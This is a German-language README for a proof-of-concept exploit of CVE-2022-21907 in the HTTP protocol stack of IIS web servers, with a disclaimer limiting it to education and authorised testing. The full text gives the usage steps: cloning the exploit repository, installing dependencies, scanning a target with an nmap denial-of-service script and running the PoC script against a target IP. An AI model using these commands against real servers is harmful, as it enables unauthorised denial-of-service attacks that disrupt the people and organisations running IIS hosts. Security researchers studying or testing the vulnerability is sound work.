
Proof-of-Concept-Exploit für CVE-2022-21907, eine Remote-Codeausführungsschwachstelle im HTTP-Protokollstapel in IIS-Webservern. Enthält Erkennungs- und Denial-of-Service-Funktionen für autorisierte Sicherheitstests.
⚠️ Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke
Großer Dank gilt dem ursprünglichen PoC-Autor NU11SECURITY und michelep
Schwachstelle zur Remote-Codeausführung im HTTP-Protokollstapel. Diese Schwachstelle würde einen Denial-of-Service-Angriff auf ein Zielsystem mit einem IIS-Webserver verursachen.
Git installieren, dann das PoC aus dem GitHub-Repository klonen:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
Installieren Sie die Abhängigkeiten mit dem pip3-Befehl:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
Überprüfen Sie das Vorhandensein der Schwachstelle auf dem Zielsystem mit dem Befehl:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
Dann führen Sie die PoC-Skripte mit dem Befehl aus:
python3 CVE-2022-21907.py -i 10.10.1.10
Hinweise: Geben Sie die Option -i mit der Ziel-IP-Adresse an